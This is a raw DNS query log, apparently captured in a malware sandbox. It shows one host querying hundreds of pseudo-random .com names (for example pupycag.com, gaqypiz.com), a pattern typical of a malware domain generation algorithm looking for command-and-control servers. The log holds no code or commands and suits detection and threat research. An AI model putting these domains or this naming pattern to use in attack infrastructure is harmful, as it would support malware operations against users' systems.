                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121572971 CET192.168.2.101.1.1.10x5e53Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121646881 CET192.168.2.101.1.1.10x1683Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121768951 CET192.168.2.101.1.1.10x66aeStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121815920 CET192.168.2.101.1.1.10x71adStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121979952 CET192.168.2.101.1.1.10x5adStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122004032 CET192.168.2.101.1.1.10x2ba7Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122137070 CET192.168.2.101.1.1.10x757cStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122232914 CET192.168.2.101.1.1.10xb792Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122349977 CET192.168.2.101.1.1.10x4777Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.135391951 CET192.168.2.101.1.1.10x11bStandard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136482954 CET192.168.2.101.1.1.10x193fStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136703968 CET192.168.2.101.1.1.10x7c8dStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136887074 CET192.168.2.101.1.1.10x1ac7Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137048006 CET192.168.2.101.1.1.10xa1ffStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137207985 CET192.168.2.101.1.1.10xd5e9Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137444019 CET192.168.2.101.1.1.10xccdeStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.139664888 CET192.168.2.101.1.1.10xf575Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.139879942 CET192.168.2.101.1.1.10x3b84Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140053988 CET192.168.2.101.1.1.10xf9bcStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140450954 CET192.168.2.101.1.1.10x4c7bStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140656948 CET192.168.2.101.1.1.10x93e8Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140841007 CET192.168.2.101.1.1.10xd433Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141026974 CET192.168.2.101.1.1.10x6d83Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141165018 CET192.168.2.101.1.1.10xcda3Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141307116 CET192.168.2.101.1.1.10x6216Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141457081 CET192.168.2.101.1.1.10xd034Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141596079 CET192.168.2.101.1.1.10xd15bStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150409937 CET192.168.2.101.1.1.10xecb9Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150588036 CET192.168.2.101.1.1.10xda94Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151690006 CET192.168.2.101.1.1.10xcb7eStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151912928 CET192.168.2.101.1.1.10xfc3dStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152066946 CET192.168.2.101.1.1.10x3585Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152105093 CET192.168.2.101.1.1.10xcb28Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.153012991 CET192.168.2.101.1.1.10xebecStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.998486996 CET192.168.2.101.1.1.10x55cfStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.998717070 CET192.168.2.101.1.1.10xa46dStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.999821901 CET192.168.2.101.1.1.10x88beStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.002121925 CET192.168.2.101.1.1.10xbebaStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.007819891 CET192.168.2.101.1.1.10x2832Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.008665085 CET192.168.2.101.1.1.10x1b92Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.012741089 CET192.168.2.101.1.1.10x3ccStandard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.021445990 CET192.168.2.101.1.1.10x24faStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.045924902 CET192.168.2.101.1.1.10x212fStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.048953056 CET192.168.2.101.1.1.10x14fdStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.050997972 CET192.168.2.101.1.1.10x27a7Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.051579952 CET192.168.2.101.1.1.10x3eb5Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.062500954 CET192.168.2.101.1.1.10x898aStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.085716009 CET192.168.2.101.1.1.10xf333Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.086219072 CET192.168.2.101.1.1.10xbb8Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097089052 CET192.168.2.101.1.1.10x9cecStandard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097523928 CET192.168.2.101.1.1.10x53d6Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099051952 CET192.168.2.101.1.1.10xec7fStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099971056 CET192.168.2.101.1.1.10x920aStandard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.100871086 CET192.168.2.101.1.1.10xfd06Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.102935076 CET192.168.2.101.1.1.10x2a54Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.103333950 CET192.168.2.101.1.1.10xf6c0Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106138945 CET192.168.2.101.1.1.10x7e2dStandard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106456041 CET192.168.2.101.1.1.10x8a2dStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107441902 CET192.168.2.101.1.1.10xfdbbStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107947111 CET192.168.2.101.1.1.10x3c28Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.108340979 CET192.168.2.101.1.1.10x5611Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.109929085 CET192.168.2.101.1.1.10xe524Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112447977 CET192.168.2.101.1.1.10x8a9fStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112998962 CET192.168.2.101.1.1.10x8497Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.113352060 CET192.168.2.101.1.1.10x5ab9Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.114106894 CET192.168.2.101.1.1.10x417eStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.120963097 CET192.168.2.101.1.1.10xa160Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.121244907 CET192.168.2.101.1.1.10xc22dStandard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.124156952 CET192.168.2.101.1.1.10x9494Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.125891924 CET192.168.2.101.1.1.10x8156Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.126101017 CET192.168.2.101.1.1.10xb5aStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129201889 CET192.168.2.101.1.1.10x66c0Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129405022 CET192.168.2.101.1.1.10x30d5Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129729033 CET192.168.2.101.1.1.10xf293Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130438089 CET192.168.2.101.1.1.10x37e7Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130765915 CET192.168.2.101.1.1.10xf8a1Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130964994 CET192.168.2.101.1.1.10xb7c9Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.131062031 CET192.168.2.101.1.1.10x4ce1Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139609098 CET192.168.2.101.1.1.10x1e26Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139802933 CET192.168.2.101.1.1.10x6a4cStandard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139982939 CET192.168.2.101.1.1.10x6dfdStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140218973 CET192.168.2.101.1.1.10x28b4Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140619040 CET192.168.2.101.1.1.10xe134Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140808105 CET192.168.2.101.1.1.10xae2Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.145772934 CET192.168.2.101.1.1.10x1444Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET192.168.2.101.1.1.10x73f4Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET192.168.2.101.1.1.10x66feStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146271944 CET192.168.2.101.1.1.10x295cStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146450043 CET192.168.2.101.1.1.10xa0dStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146805048 CET192.168.2.101.1.1.10xa280Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.147512913 CET192.168.2.101.1.1.10x82a3Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.147876024 CET192.168.2.101.1.1.10x24ccStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.148066044 CET192.168.2.101.1.1.10x5c68Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.148274899 CET192.168.2.101.1.1.10x1d6fStandard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.150913954 CET192.168.2.101.1.1.10x4fc8Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.151372910 CET192.168.2.101.1.1.10xf325Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.154041052 CET192.168.2.101.1.1.10x1dbfStandard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.154139996 CET192.168.2.101.1.1.10x7973Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.970642090 CET192.168.2.101.1.1.10x2a7dStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.033559084 CET192.168.2.101.1.1.10xc616Standard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.179130077 CET192.168.2.101.1.1.10x35d3Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.179676056 CET192.168.2.101.1.1.10x4b68Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.180771112 CET192.168.2.101.1.1.10x9b1dStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.182063103 CET192.168.2.101.1.1.10xea81Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.187695980 CET192.168.2.101.1.1.10x4393Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.201502085 CET192.168.2.101.1.1.10xd144Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.210520029 CET192.168.2.101.1.1.10xf34Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.215521097 CET192.168.2.101.1.1.10x6ba8Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.216233969 CET192.168.2.101.1.1.10xb94cStandard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.216943026 CET192.168.2.101.1.1.10x7fd6Standard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.217684031 CET192.168.2.101.1.1.10x4d17Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.218456984 CET192.168.2.101.1.1.10x8812Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.219336987 CET192.168.2.101.1.1.10xd0c6Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.219651937 CET192.168.2.101.1.1.10x9f49Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.220315933 CET192.168.2.101.1.1.10x1734Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.220988989 CET192.168.2.101.1.1.10x5c57Standard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.221841097 CET192.168.2.101.1.1.10xccc7Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.222426891 CET192.168.2.101.1.1.10x36fdStandard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.223148108 CET192.168.2.101.1.1.10xd0Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.223961115 CET192.168.2.101.1.1.10x8634Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.240113020 CET192.168.2.101.1.1.10x6fb1Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.249005079 CET192.168.2.101.1.1.10x8383Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.258826971 CET192.168.2.101.1.1.10x5ce9Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.259371042 CET192.168.2.101.1.1.10xcfabStandard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.259582996 CET192.168.2.101.1.1.10x43ffStandard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260139942 CET192.168.2.101.1.1.10x74fcStandard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260256052 CET192.168.2.101.1.1.10x4b9aStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260371923 CET192.168.2.101.1.1.10x56b1Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260518074 CET192.168.2.101.1.1.10x41c1Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.260812044 CET192.168.2.101.1.1.10xd364Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.261020899 CET192.168.2.101.1.1.10x36d7Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.262558937 CET192.168.2.101.1.1.10xcb93Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.271589041 CET192.168.2.101.1.1.10xdf93Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272093058 CET192.168.2.101.1.1.10x56feStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272428989 CET192.168.2.101.1.1.10xf322Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.272598982 CET192.168.2.101.1.1.10xaaeStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.273502111 CET192.168.2.101.1.1.10x797bStandard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.274430037 CET192.168.2.101.1.1.10xb544Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.274610996 CET192.168.2.101.1.1.10x9256Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.276597977 CET192.168.2.101.1.1.10xad62Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.277184010 CET192.168.2.101.1.1.10x43aeStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.277668953 CET192.168.2.101.1.1.10x42beStandard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.283703089 CET192.168.2.101.1.1.10xd5dStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.283983946 CET192.168.2.101.1.1.10x2b5bStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284025908 CET192.168.2.101.1.1.10xc4a4Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284349918 CET192.168.2.101.1.1.10xd93aStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284363985 CET192.168.2.101.1.1.10xbadaStandard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284558058 CET192.168.2.101.1.1.10xacceStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284663916 CET192.168.2.101.1.1.10x1468Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.284872055 CET192.168.2.101.1.1.10xdbbdStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.285029888 CET192.168.2.101.1.1.10xad0cStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.285442114 CET192.168.2.101.1.1.10x78ebStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.287086010 CET192.168.2.101.1.1.10x40eaStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.287775040 CET192.168.2.101.1.1.10xcea3Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.289813995 CET192.168.2.101.1.1.10x4527Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.289877892 CET192.168.2.101.1.1.10xde4dStandard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.290936947 CET192.168.2.101.1.1.10xa1faStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.291100979 CET192.168.2.101.1.1.10x67a2Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.296725035 CET192.168.2.101.1.1.10x3c67Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.298563004 CET192.168.2.101.1.1.10x9777Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.298896074 CET192.168.2.101.1.1.10xd3f0Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.299371004 CET192.168.2.101.1.1.10x11d5Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.299495935 CET192.168.2.101.1.1.10x3ff2Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.299549103 CET192.168.2.101.1.1.10xe294Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.792053938 CET192.168.2.101.1.1.10xb035Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.793081999 CET192.168.2.101.1.1.10x433Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.793442011 CET192.168.2.101.1.1.10x6cc2Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.794318914 CET192.168.2.101.1.1.10xa636Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.797736883 CET192.168.2.101.1.1.10xed21Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.803006887 CET192.168.2.101.1.1.10xe885Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.813280106 CET192.168.2.101.1.1.10x3d1cStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.813600063 CET192.168.2.101.1.1.10xeStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.823415995 CET192.168.2.101.1.1.10x10fdStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.824935913 CET192.168.2.101.1.1.10xe0f0Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.840424061 CET192.168.2.101.1.1.10x72adStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.846743107 CET192.168.2.101.1.1.10xd7b1Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.849678993 CET192.168.2.101.1.1.10x33b7Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.851804972 CET192.168.2.101.1.1.10x8172Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.852739096 CET192.168.2.101.1.1.10x7d3fStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.853419065 CET192.168.2.101.1.1.10x9507Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.854592085 CET192.168.2.101.1.1.10xa005Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.856432915 CET192.168.2.101.1.1.10xd123Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.858774900 CET192.168.2.101.1.1.10x448bStandard query (0)qedyrag.comA (IP address)IN (0x0001)false
